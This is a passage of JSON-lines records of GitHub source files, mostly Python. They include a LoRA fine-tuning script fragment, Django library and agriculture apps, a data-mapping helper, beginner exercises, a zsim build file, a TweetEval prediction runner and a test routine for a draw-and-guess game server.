\"target\" # column of the output text\n# custom instruct prompt start\n# prompt_template = f\"Summarize the following news article:\\n{{input}}\\nSummary:\\n\"\nprompt_template = f\"Translate Hindi to Kannada:\\n {{input}}\\nTranslation:\\n\"\n\n\n# Load dataset from the hub\ndataset = load_dataset(dataset_id,name=dataset_config)\n# Load tokenizer of FLAN-t5-base\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\n\nprint(f\"Train dataset size: {len(dataset['train'])}\")\nprint(f\"Test dataset size: {len(dataset['test'])}\")\n\nprompt_length = len(tokenizer(prompt_template.format(input=\"\"))[\"input_ids\"])\nmax_sample_length = tokenizer.model_max_length - prompt_length\nprint(f\"Prompt length: {prompt_length}\")\nprint(f\"Max input length: {max_sample_length}\")\n\n\nfrom datasets import concatenate_datasets\nimport numpy as np\n# The maximum total input sequence length after tokenization. \n# Sequences longer than this will be truncated, sequences shorter will be padded.\ntokenized_inputs = concatenate_datasets([dataset[\"train\"], dataset[\"test\"]]).map(lambda x: tokenizer(x[text_column], truncation=True), batched=True, remove_columns=[text_column, summary_column])\nmax_source_length = max([len(x) for x in tokenized_inputs[\"input_ids\"]])\nmax_source_length = min(max_source_length, max_sample_length)\nprint(f\"Max source length: {max_source_length}\")\n \n# The maximum total sequence length for target text after tokenization. \n# Sequences longer than this will be truncated, sequences shorter will be padded.\"\ntokenized_targets = concatenate_datasets([dataset[\"train\"], dataset[\"test\"]]).map(lambda x: tokenizer(x[summary_column], truncation=True), batched=True, remove_columns=[text_column, summary_column])\ntarget_lenghts = [len(x) for x in tokenized_targets[\"input_ids\"]]\n# use 95th percentile as max target length\nmax_target_length = int(np.percentile(target_lenghts, 95))\nprint(f\"Max target length: {max_target_length}\")\n\n\n\ndef preprocess_function(sample, padding=\"max_length\"):\n\n inputs = [prompt_template.format(input=item) for item in sample[text_column]]\n model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, padding=padding, truncation=True)\n\n labels = tokenizer(text_target=sample[summary_column], max_length=max_target_length, padding=padding, truncation=True)\n\n if padding == \"max_length\":\n labels[\"input_ids\"] = [[(l if l != tokenizer.pad_token_id else -100) for l in label] for label in labels[\"input_ids\"]]\n model_inputs[\"labels\"] = labels[\"input_ids\"]\n return model_inputs\n\ntokenized_dataset = dataset.map(preprocess_function, batched=True, remove_columns=list(dataset[\"train\"].features))\ntrain_data=tokenized_dataset[\"train\"]\ntest_data=tokenized_dataset[\"test\"]\nprint(\"generation_max_length : \",max_target_length)\n\n\n\n#load the model and train\n\n\nfrom transformers import TrainingArguments, Trainer\n\ntraining_args = TrainingArguments(\n \"temp\",\n evaluation_strategy=\"epoch\",\n learning_rate=1e-3,\n gradient_accumulation_steps=1,\n auto_find_batch_size=True,\n num_train_epochs=3,\n save_steps=1000,\n save_total_limit=8,\n per_device_train_batch_size=64\n)\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_data,\n eval_dataset=test_data,\n)\n# model.config.use_cache = False\n\ntrainer.train()\n\nlora_model_id = \"results\"\ntrainer.model.save_pretrained(lora_model_id)\ntokenizer.save_pretrained(lora_model_id)\n","repo_name":"ShrinivasSK/NMT","sub_path":"lora_flan_t5_xl.py","file_name":"lora_flan_t5_xl.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23291522704","text":"import secrets\nimport string\nfrom datetime import timedelta, date\n\nfrom django.core.management.base import BaseCommand\nimport random\nfrom library.models import Book, Library, Author\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n for i in range(1000):\n\n Library.objects.create(\n library_name=''.join(secrets.choice(string.ascii_uppercase + string.digits) for i in range(5)),\n address=''.join(secrets.choice(string.ascii_uppercase + string.digits) for i in range(15)),\n capacity=random.randint(1, 9223372036854775807)\n )\n\n start_date = date(1812, 1, 1)\n end_date = date(2005, 12, 31)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n random_date = start_date + timedelta(days=random_number_of_days)\n\n Author.objects.create(\n author_name=''.join(secrets.choice(string.ascii_uppercase + string.digits) for i in range(7)),\n date_of_birth=random_date\n )\n\n first_author_id = Author.objects.values('id').first()['id']\n last_author_id = Author.objects.values('id').last()['id']\n first_library_id = Library.objects.values('id').first()['id']\n last_library_id = Library.objects.values('id').last()['id']\n\n Book.objects.create(\n name=''.join(secrets.choice(string.ascii_uppercase + string.digits) for _ in range(15)),\n publication_year=random.randint(1890, 2021),\n library_id=Library.objects.get(id=random.randint(first_library_id, last_library_id))).\\\n authors_names.add(Author.objects.get(id=random.randint(first_author_id, last_author_id)))\n","repo_name":"VMerk8/ZeptoTest","sub_path":"library/management/commands/add_libraries_books_authors.py","file_name":"add_libraries_books_authors.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39257412381","text":"def map_columns(input):\n results = []\n for data in input[\"data\"]:\n result = {}\n for key, value in data.items():\n mapped_key = None\n for column_map in input[\"mapping\"]:\n if column_map['column'] == key:\n mapped_key = column_map['desired_column']\n break\n\n if mapped_key is not None:\n mapped_value = value\n\n # Check if a character needs to be replaced\n replace_characters = column_map.get('replace_characters')\n if replace_characters:\n for old, new in replace_characters.items():\n mapped_value = mapped_value.replace(old, new)\n\n value_mapping = column_map.get('value_mapping')\n if value_mapping:\n if value in value_mapping:\n mapped_value = value_mapping[value]\n else:\n mapped_value = value_mapping[\"fallback\"]\n\n concatenate_order = column_map.get('concatenate_order')\n\n if concatenate_order:\n concatenate_value = ''\n for order_item in concatenate_order:\n if 'column' in order_item and order_item['column'] in data:\n concatenate_value += str(data[order_item['column']])\n\n if 'string' in order_item:\n concatenate_value += order_item['string']\n\n mapped_value = concatenate_value\n \n # Check if needs to be a required value\n required_values = column_map.get('required_values')\n if required_values and value not in required_values:\n break\n\n result[mapped_key] = mapped_value\n\n # Check for required fields\n missing_fields = [column_map['desired_column'] for column_map in input[\"mapping\"] if column_map.get('required', False) and column_map['desired_column'] not in result]\n \n # Check required values are not empty\n empty_fields = [column_map['desired_column'] for column_map in input[\"mapping\"] if column_map.get('required', False) and column_map['desired_column'] in result and not result[column_map['desired_column']]]\n \n if not missing_fields and not empty_fields:\n results.append(result)\n return results\n\n# Example dictionary and mapping\ninput = {\n \n}\ninput[\"data\"] = [\n {\n \"MemberNumber\": \"3177663559\",\n \"Action\": \"LOGIN\",\n \"ReplaceMe\":\"P1000\",\n \"Account\":\"1000\",\n \"Suffix\":\"S\"\n }\n]\n\ninput[\"mapping\"] = [\n {\n \"column\": \"MemberNumber\",\n \"desired_column\": \"unique_id\",\n \"required\": True\n },\n {\n \"column\": \"Action\",\n \"value_mapping\": {\n \"LOGIN\": True,\n \"fallback\": False\n },\n \"desired_column\": \"online-banking\",\n \"required\": True\n },\n {\n \"column\": \"ReplaceMe\",\n \"replace_characters\": {\n \"P\": \"\"\n },\n \"desired_column\": \"account_number\",\n \"required\": True\n },\n {\n \"column\": \"Account\",\n \"concatenate_order\": [\n {\n \"column\":\"Account\"\n },\n {\n \"column\":\"Suffix\"\n },\n {\n \"string\":\"L\"\n }\n ],\n \"desired_column\": \"account_number\",\n \"required\": True\n }\n ]\n\n# Map columns\nmapped_data = map_columns(input)\n\n# Print the mapped input[\"data\"]\nprint(mapped_data)\n","repo_name":"shawnhasten2/Tray-Work","sub_path":"COFCU/validateDataV1.py","file_name":"validateDataV1.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5890959185","text":"from django.shortcuts import render\n\nbooks = [\n {\n \"id\": \"1\",\n \"editorial\": \"Editorial 1\",\n \"pais\": \"Chile\",\n \"fecha\": \"2021-10-10\",\n \"autor\": \"Juan\",\n \"titulo\": \"El libro de Juan\",\n \"descripcion\": \"Este es el libro de Juan\",\n \"materia\": \"Matematicas\",\n \"año\": \"2021\", \n },\n {\n \"id\": \"2\",\n \"editorial\": \"Editorial 2\",\n \"pais\": \"Cuba\",\n \"fecha\": \"2021-11-10\",\n \"autor\": \"Ari\",\n \"titulo\": \"El libro de Ari\",\n \"descripcion\": \"Este es el libro de Ari\",\n \"materia\": \"Lenguaje\",\n \"año\": \"2022\", \n },\n {\n \"id\": \"3\",\n \"editorial\": \"Editorial 2\",\n \"pais\": \"Cuba\",\n \"fecha\": \"2021-11-10\",\n \"autor\": \"Ari\",\n \"titulo\": \"El 2do libro de Ari\",\n \"descripcion\": \"Este es el libro de Ari 2\",\n \"materia\": \"Programacion\",\n \"año\": \"2022\", \n },\n {\n \"id\": \"4\",\n \"editorial\": \"Editorial 1\",\n \"pais\": \"Chile\",\n \"fecha\": \"2021-10-10\",\n \"autor\": \"Alberto\",\n \"titulo\": \"El libro de Alberto\",\n \"descripcion\": \"Este es el libro de Alberto\",\n \"materia\": \"Matematicas\",\n \"año\": \"2021\", \n },\n]\n\nprestados = [{\n \"id_libro\": \"1\",\n \"fecha_devolucion\": \"2021-10-10\",\n \"fecha_prestamo\": \"2021-10-10\",\n}]\n\ndef index(request):\n return render(request, \"home.html\")\n\ndef all(request):\n return render(request, \"books.html\",{\"books\":books})\n\ndef book(request):\n id = request.GET.get(\"id\") \n partial = filter(lambda e: e[\"id\"] == id,books)\n partial = list(partial)\n return render(request, \"book.html\",{\"books\":partial})\n\ndef materia(request):\n materia = request.GET.get(\"materia\")\n partial = filter(lambda e: e[\"materia\"] == materia,books) #SQL a la BD\n return render(request, \"books.html\",{\"books\":partial})\n\ndef autor(request):\n autor = request.GET.get(\"autor\")\n partial = filter(lambda e: e[\"autor\"] == autor,books)\n return render(request, \"books.html\",{\"books\":partial})\n\ndef prestado(request):\n prestaSet = list(map(lambda e: e[\"id_libro\"] ,prestados))\n partial = filter(lambda e: e[\"id\"] in prestaSet ,books) #SQL a la BD\n partial = list(partial)\n return render(request, \"books.html\",{\"books\":partial})","repo_name":"odtorres/biblioteca-ary","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36417660080","text":"# Inheritence\n\nclass Employee():\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def add(Self, para1):\n name = \"abcdedf\"\n print(\"Add Employee Method\", para1, Self.name, \" and without self\", name)\n\nclass EmployeeHR(Employee):\n def __init__(self, name, age, hireby):\n super().__init__(name, age)\n self.hireby = hireby\n\n\nemployee2 = EmployeeHR('xyz', 40, 'faisal')\n\nprint(employee2.name)\nprint(employee2.age)\n\nemployee2.add(\"Employee 2\")\n\n \n","repo_name":"salirazakazmi/PythonBasics","sub_path":"ProjectwithVirtualEnviroment/OOPexp.py","file_name":"OOPexp.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4159997979","text":"# В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\n\n\nfrom random import randint\n\n# параметры массива случайных чисел\nMIN_RND = 10\nMAX_RND = 200\nSIZE = 15\n\n# создание и заполнение массива\nbefore_mas = [randint(MIN_RND, MAX_RND) for _ in range(SIZE)]\n\n# переменные мин., макс, и их индексы изначально соответствуют нулевому элементу массива\nminimum, maximum = before_mas[0], before_mas[0]\nmin_index, max_index = 0, 0\n\n# поиск минимума и максимума в массиве перебором, сохранение их инджексов\nfor i, item in enumerate(before_mas):\n if item < minimum:\n minimum = item\n min_index = i\n if item > maximum:\n maximum = item\n max_index = i\n\n# копия массива, замена мин. и макс, местами\nafter_mas = before_mas[:]\nafter_mas[min_index], after_mas[max_index] = after_mas[max_index], after_mas[min_index]\n\nprint(f'Мин: {minimum}. Макс: {maximum}. Индексы: {min_index}, {max_index}.')\nprint('Массив до и после замены min и max местам соответственно:')\nprint(after_mas)\nprint(before_mas)\n","repo_name":"aechernenko/gbu_ai","sub_path":"Algorithms/lesson_3/les_3_task_3.py","file_name":"les_3_task_3.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21076396543","text":"import tkinter as tk\n\n# Importa as funções das aplicações de inserção e pesquisa de dados\nfrom adicionar import adicionar\nfrom pesquisar import pesquisar\n\nroot = tk.Tk()\nroot.title('Gerenciamento de Dados')\n\nmenu = tk.Menu(root)\nroot.config(menu=menu)\n\ninserir_menu = tk.Menu(menu)\npesquisar_menu = tk.Menu(menu)\nmenu.add_cascade(label='Inserir', menu=inserir_menu)\nmenu.add_cascade(label='Pesquisar', menu=pesquisar_menu)\ninserir_menu.add_command(label='Inserir Dados', command=adicionar)\npesquisar_menu.add_command(label='Pesquisar Dados', command=pesquisar)\n\n# Remove as chamadas das aplicações de inserção de dados e pesquisa de dados\n#adicionar()\n#pesquisar()\n\nroot.mainloop()\n","repo_name":"ricardoviannajr/SICONTRAR","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18962379341","text":"# -*- mode:python -*-\n\nimport os\nImport(\"env\")\n\ncommonSrcs = [\"config.cpp\", \"galloc.cpp\", \"log.cpp\", \"pin_cmd.cpp\"]\nharnessSrcs = [\"zsim_harness.cpp\", \"debug_harness.cpp\"]\n\n# By default, we compile all cpp files in libzsim.so. List the cpp files that\n# should be excluded below (one per line and in order, to ease merges)\nexcludeSrcs = [\n\"fftoggle.cpp\",\n]\nexcludeSrcs += harnessSrcs\n\n# Build libzsim.so\nglobSrcNodes = Glob(\"*.cpp\") + Glob(\"virt/*.cpp\")\nlibSrcs = [str(x) for x in globSrcNodes if str(x) not in excludeSrcs]\nlibSrcs.append(env[\"NVMAINSOURCES\"])\nlibEnv = env.Clone()\nlibEnv[\"CPPFLAGS\"] += libEnv[\"PINCPPFLAGS\"]\nlibEnv[\"LINKFLAGS\"] += libEnv[\"PINLINKFLAGS\"]\nlibEnv[\"LIBPATH\"] += libEnv[\"PINLIBPATH\"]\nlibEnv[\"LIBS\"] += libEnv[\"PINLIBS\"]\nlibEnv.SharedLibrary(\"zsim.so\", libSrcs)\n\n# Build harness (static to make it easier to run across environments)\nenv[\"LINKFLAGS\"] += \" --static \"\nenv[\"LIBS\"] += [\"pthread\"]\nenv.Program(\"zsim\", harnessSrcs + commonSrcs)\n\n# Build additional utilities below\nenv.Program(\"fftoggle\", [\"fftoggle.cpp\"] + commonSrcs)\n","repo_name":"AXLEproject/axle-zsim-nvmain","sub_path":"src/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"66"} +{"seq_id":"19632807895","text":"from django.db import models\n\nclass Evento (models.Model):\n nome = models.CharField(max_length=30, null=False)\n\n def __str__(self):\n return str(self.id) + '-' + self.nome\n \nclass ComunicadoCliente (models.Model):\n id = models.AutoField(primary_key = True, auto_created=True)\n cpf = models.CharField(max_length=11, null=False)\n nome = models.CharField(max_length=80, null=False)\n email = models.EmailField(max_length=100, null=False)\n evento = models.ForeignKey(Evento, on_delete=models.PROTECT, related_name=\"evento\")\n lavoura_lat = models.FloatField(null=False)\n lavoura_lon = models.FloatField(null=False)\n lavoura_tipo = models.SmallIntegerField(null=False)\n lavoura_data_colheita = models.DateTimeField()\n inserted_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n is_active = models.BooleanField(default=True)\n\n def __str__(self):\n return self.nome + \" - \" + self.cpf\n","repo_name":"Regismrs/proagro-cps-backend","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5255831206","text":"import os\nimport sys\n\nTASKS = [\n 'emoji',\n 'emotion',\n 'hate',\n 'irony',\n 'offensive',\n 'sentiment',\n 'stance']\n\nSTANCE_TASKS = [\n 'abortion',\n 'atheism',\n 'climate',\n 'feminist',\n 'hillary']\n\n\ndef predict(args):\n cmd = '''python ./class.py \\\n --model_name_or_path {args[model_name_or_path]} \\\n --cache_dir ../../.cache \\\n --do_predict \\\n --use_fast_tokenizer \\\n --per_device_train_batch_size 4 \\\n --per_device_eval_batch_size 4 \\\n --gradient_accumulation_steps 2 \\\n --test_file {args[test_file]} \\\n --task_name {args[task_name]} \\\n --output_dir {args[output_dir]}'''.format(args=args)\n os.system(cmd)\n\n\ndef main():\n root = sys.argv[2]\n model = sys.argv[1]\n run_args = {}\n for task in TASKS:\n if task == 'stance':\n for st in STANCE_TASKS:\n run_args['test_file'] = os.path.join('../ds/tweeteval/datasets/', task, st, 'test.csv')\n run_args['model_name_or_path'] = os.path.join('../../', model, task, st) + '/'\n run_args['output_dir'] = os.path.join(root, task)\n run_args['task_name'] = st\n predict(args=run_args)\n else:\n run_args['test_file'] = os.path.join('../ds/tweeteval/datasets/', task, 'test.csv')\n run_args['model_name_or_path'] = os.path.join('../../', model, task) + '/'\n run_args['output_dir'] = os.path.join(root)\n run_args['task_name'] = task\n predict(args=run_args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HolmiumTS/ppppplm","sub_path":"class/tweeteval_predict.py","file_name":"tweeteval_predict.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"37402221595","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom flask_restful import Api, Resource\nfrom DB import DB\nfrom InteractionCheck.DrugIdentifier import DrugIdentifier\nfrom InteractionCheck.DrugInteractions import DrugInteractions\nfrom validator.drug_validator import check_drug\n\napp = Flask(__name__)\ncors = CORS(app)\napi = Api(app)\n\n\n# suggestions for drug names when searching for one\nclass DrugSuggestions(Resource):\n def get(self):\n data_base = DB()\n drug_list = data_base.fetch_all_data(\n \"SELECT english_name,hebrew_name FROM drug_name\", '')\n english_hebrew = {}\n for drug in drug_list:\n english_name = drug[0].split()[0]\n hebrew_name = drug[1].split()[0]\n if english_name not in english_hebrew and hebrew_name not in english_hebrew:\n english_hebrew[english_name] = hebrew_name\n drug_list_dict = []\n dict = {}\n for english_name, hebrew_name in english_hebrew.items():\n dict['name'] = english_name + ' / ' + hebrew_name\n drug_list_dict.append(dict.copy())\n data_base.close_connection()\n print(drug_list_dict)\n return jsonify(drug_list_dict)\n\n\n# check interaction between drugs\nclass InteractionCheck(Resource):\n def get(self):\n drugs_sent = request.args\n drug_list = [drug.split(\" / \")[0] for drug in list(drugs_sent.keys())]\n drug_objects = []\n for drug in drug_list:\n drug_objects.append(DrugIdentifier(drug))\n interaction = DrugInteractions(drug_objects)\n return jsonify(interaction.interaction_results)\n\n\n# get stats of interactions\nclass InteractionStats(Resource):\n def get(self):\n stats = {}\n stats['symptoms'] = {}\n stats['report_num'] = 0\n stats['severity'] = {}\n stats['severity']['sever'] = 0\n stats['severity']['notSever'] = 0\n\n drugs_sent = request.args\n drug_list = [drug.split(\" / \")[0] for drug in list(drugs_sent.keys())]\n\n drug_objects = []\n\n for drug in drug_list:\n drug_objects.append(DrugIdentifier(drug))\n\n drug_heb_eng_names = []\n for obj in drug_objects:\n drug_heb_eng_names.append(obj.drug_english_name)\n drug_heb_eng_names.append(obj.drug_hebrew_name)\n data_base = DB()\n symptoms_stats = data_base.fetch_all_data(\n \"SELECT drugs,symptoms,severity FROM report_details WHERE serial>6\", '')\n print(symptoms_stats)\n for element in symptoms_stats:\n set1 = set(element[0])\n set2 = set(drug_heb_eng_names)\n if len(set1.intersection(set2)) != 0 and len(set1.intersection(set2)) == len(set2) / 2:\n check = True\n else:\n check = False\n if check and len(list(drugs_sent.keys())) / len(element[0]) >= 0.6:\n stats['report_num'] += 1\n for symptom in element[1]:\n if symptom not in stats['symptoms']:\n stats['symptoms'][symptom] = 0\n stats['symptoms'][symptom] += 1\n for severity in element[2]:\n if severity != \"\":\n stats['severity'][severity] += 1\n print(stats)\n data_base.close_connection()\n\n return jsonify(stats)\n\n\n# get stats of one drug\nclass SearchStats(Resource):\n def get(self):\n stats = {}\n stats['symptoms'] = {}\n stats['report_num'] = 0\n stats['severity'] = {}\n stats['severity']['sever'] = 0\n stats['severity']['notSever'] = 0\n\n drug_sent = request.args\n drug_sent =list(drug_sent.keys())\n data_base = DB()\n\n symptoms_stats = data_base.fetch_all_data(\n \"SELECT drugs,symptoms,severity FROM report_details WHERE serial>6\", '')\n for element in symptoms_stats:\n if drug_sent[0] in element[0] or drug_sent[1] in element[0]:\n stats['report_num'] += 1\n for symptom in element[1]:\n if symptom not in stats['symptoms']:\n stats['symptoms'][symptom] = 0\n stats['symptoms'][symptom] += 1\n for severity in element[2]:\n if severity != \"\":\n stats['severity'][severity] += 1\n data_base.close_connection()\n print(stats)\n return jsonify(stats)\n\n\n# check interaction between drugs\nclass DrugSearch(Resource):\n def get(self):\n drug_sent = list(request.args.keys())[0]\n drug_sent = drug_sent.split(\" / \")[0]\n drug_details = DrugIdentifier(drug_sent)\n print(drug_details.build_search_answer())\n return jsonify(drug_details.build_search_answer())\n\n\n# check interaction between drugs\nclass NewDrug(Resource):\n def post(self):\n drug_sent = request.get_json(force=True)\n print(drug_sent['commercialName'], drug_sent['genericName'], drug_sent['useForm'])\n check = check_drug(drug_sent['commercialName'], drug_sent['genericName'])\n if check is False:\n new_drug_data = (drug_sent['commercialName'], drug_sent['genericName'], drug_sent['useForm'])\n data_base = DB()\n postgres_insert_query = \"\"\" INSERT INTO new_drug_suggest (commercialName, genericName,useForm)\\\n VALUES (%s,%s,%s)\"\"\"\n data_base.insert_data_row(postgres_insert_query, new_drug_data)\n data_base.close_connection()\n\n\nclass SideEfecetReport(Resource):\n def post(self):\n real = True\n drug_sent = request.get_json(force=True)\n print(drug_sent)\n user_data = (drug_sent['factorName'], drug_sent['email'], drug_sent['phoneNumber'], drug_sent['sector'],\n drug_sent['medicalSector'], real)\n drug_list = [item['name'].split(\" / \")[0] for item in drug_sent['drugList']]\n untilDate_list = [item['untilDate'] for item in drug_sent['drugList']]\n fromDate_list = [item['fromDate'] for item in drug_sent['drugList']]\n symptom_list = [item['name'] for item in drug_sent['symptomList']]\n severity_list = [item['severity'] for item in drug_sent['symptomList']]\n appearDate_list = [item['appearDate'] for item in drug_sent['symptomList']]\n isNewDrug_list = [item['isNewDrug'] for item in drug_sent['drugList']]\n\n report_data = (\n drug_list, fromDate_list, untilDate_list, severity_list, appearDate_list, symptom_list, real, isNewDrug_list)\n print(report_data)\n data_base = DB()\n postgres_insert_query = \"\"\" INSERT INTO private_user_details (factor_name, email,phone,sector,medical_sector, real_data)\\\n VALUES (%s,%s,%s,%s,%s,%s)\"\"\"\n data_base.insert_data_row(postgres_insert_query, user_data)\n postgres_insert_query = \"\"\"INSERT INTO report_details (drugs,fromDate,untilDate,severity,appearDate, symptoms, real_data,isNew) VALUES \\\n (%s,%s,%s, %s,%s,%s,%s,%s) \"\"\"\n data_base.insert_data_row(postgres_insert_query, report_data)\n data_base.close_connection()\n\n\napi.add_resource(InteractionCheck, '/check')\napi.add_resource(InteractionStats, '/stats')\napi.add_resource(DrugSuggestions, '/suggest')\napi.add_resource(DrugSearch, '/drug-search')\napi.add_resource(SideEfecetReport, '/side-effect-report')\napi.add_resource(SearchStats, '/search-stats')\napi.add_resource(NewDrug, '/new-drug')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AmitLiberman/DrugcheQ-Back-End","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8779257769","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport asyncio\nfrom room import room\nfrom client import client\nfrom roommgr import roommgr\nimport worker\n\nclass fakews:\n def __init__(self):\n pass\n\n async def send(self, msg):\n name = worker.CLIENTS[self].name\n print(\"sending to fake client: \" + name + \"; msg: \" + msg)\n\n\ndef printallclientinfo():\n for k in worker.CLIENTS:\n worker.CLIENTS[k].printinfo()\n\nasync def test():\n wslist = []\n for i in range(30):\n ws = fakews()\n wslist.append(ws)\n c = client(ws)\n worker.CLIENTS[ws] = c\n # c.name = \"CLIENT\" + i\n # c.icon = i % 10\n i = 0\n for k in worker.CLIENTS:\n i = i + 1\n c = worker.CLIENTS[k]\n name = 'CLIENT_' + str(i)\n req = {\n 'PROTO': 'REQ_REGISTER',\n 'NAME': name,\n 'ICON': i % 10\n }\n await worker.onregister(c, req)\n\n printallclientinfo()\n\n player0 = worker.CLIENTS[wslist[0]]\n await worker.oncreateroom(player0, {\n 'PROTO': 'REQ_CREATE_ROOM',\n 'NAME': 'ROOM_1',\n 'ICON': '10001',\n 'MAXPLAYERS': 5,\n 'MATCHOVERSCORE': 20\n })\n player0.printinfo()\n # printallclientinfo()\n\n r0 = roommgr().getroom(\"1000000\")\n\n\n player1 = worker.CLIENTS[wslist[1]]\n await worker.getroomlist(player1, {})\n await worker.joinroom_asplayer(player1, {\n 'PROTO': 'REQ_JOIN_ROOM_AS_PLAYER',\n 'ROOMID': \"1000000\"\n })\n player1.printinfo()\n\n viewer0 = worker.CLIENTS[wslist[2]]\n await worker.joinroom_asviewer(viewer0, {\n 'PROTO': 'REQ_JOIN_ROOM_AS_VIEWER',\n 'ROOMID': \"1000000\"\n })\n viewer0.printinfo()\n\n player2 = worker.CLIENTS[wslist[3]]\n await worker.joinroom_asplayer(player2, {\n 'PROTO': 'REQ_JOIN_ROOM_AS_PLAYER',\n 'ROOMID': \"1000000\"\n })\n player2.printinfo()\n await worker.quitroom(player2, {})\n\n player3 = worker.CLIENTS[wslist[4]]\n viewer1 = worker.CLIENTS[wslist[5]]\n # await worker.joinroom_asplayer(player3, {\n # 'PROTO': 'REQ_JOIN_ROOM_AS_PLAYER',\n # 'ROOMID': \"1000000\"\n # })\n await worker.joinrandomroom(player3, {\n 'PROTO': 'REQ_JOIN_RANDOM_ROOM',\n })\n\n # await worker.joingame(viewer0, { 'PROTO': 'REQ_JOIN_GAME' })\n # return\n\n await worker.onreadyforplay(player0, {'PROTO': 'REQ_READY_FOR_PLAY'})\n await worker.onreadyforplay(player1, {'PROTO': 'REQ_READY_FOR_PLAY'})\n await worker.oncancelready(player1, {'PROTO': 'REQ_CANCEL_PLAY'})\n await worker.onreadyforplay(player1, {'PROTO': 'REQ_READY_FOR_PLAY'})\n\n # await worker.onreadyforplay(viewer0, {'PROTO': 'REQ_READY_FOR_PLAY'})\n\n await worker.onreadyforplay(player2, {'PROTO': 'REQ_READY_FOR_PLAY'})\n await worker.onreadyforplay(player3, {'PROTO': 'REQ_READY_FOR_PLAY'})\n\n # await worker.quitroom(player3, {'PROTO': 'REQ_QUIT_ROOM'})\n\n\n await worker.startround(player0, {'PROTO': 'REQ_START_ROUND'})\n # await worker.quitroom(player0, {'PROTO': 'REQ_QUIT_ROOM'})\n await worker.send_answer(player3, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n\n # await worker.quitroom(player1, {\n # 'PROTO': 'REQ_QUIT_ROOM',\n # })\n\n await worker.send_answer(player1, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n\n # await worker.startround(player1, {'PROTO': 'REQ_START_ROUND'})\n # await worker.send_answer(player3, {\n # 'PROTO': 'REQ_SEND_ANSWER',\n # 'ANSWER': r0.answer\n # })\n # await worker.send_answer(player0, {\n # 'PROTO': 'REQ_SEND_ANSWER',\n # 'ANSWER': r0.answer\n # })\n\n await worker.skipround(player1, {'PROTO': 'REQ_SKIP_ROUND'})\n await worker.startround(player3, {'PROTO': 'REQ_START_ROUND'})\n\n await worker.drawstart(player3, {'PROTO': 'REQ_DRAW_START'})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [1]})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [2]})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [3,4,5]})\n await worker.drawundo(player3, {})\n await worker.drawundo(player3, {})\n await worker.drawundo(player3, {})\n await worker.drawundo(player3, {})\n await worker.drawstart(player3, {})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [1]})\n await worker.drawstart(player3, {})\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [2]})\n await worker.joinroom_asviewer(viewer1, {\n 'PROTO': 'REQ_JOIN_ROOM_AS_VIEWER',\n 'ROOMID': \"1000000\"\n })\n await worker.draw(player3, {'PROTO': 'REQ_DRAW', 'STEPS': [3,4,5]})\n await worker.send_answer(player1, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n await worker.send_answer(player0, {\n 'PROTO': 'REQ_SEND_ANSWER',\n 'ANSWER': r0.answer\n })\n\n # await worker.quitroom(player0, {})\n # await worker.quitroom(player1, {})\n # await worker.quitroom(player3, {})\n # await worker.quitroom(viewer0, {})\n\n\n await worker.getroomlist(player2, {})\n # printallclientinfo()\n # printallclientinfo()\n\n\ndef run():\n # asyncio.run(fill())\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())","repo_name":"IriskaDev/draw-and-guess-srv","sub_path":"testroutine.py","file_name":"testroutine.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 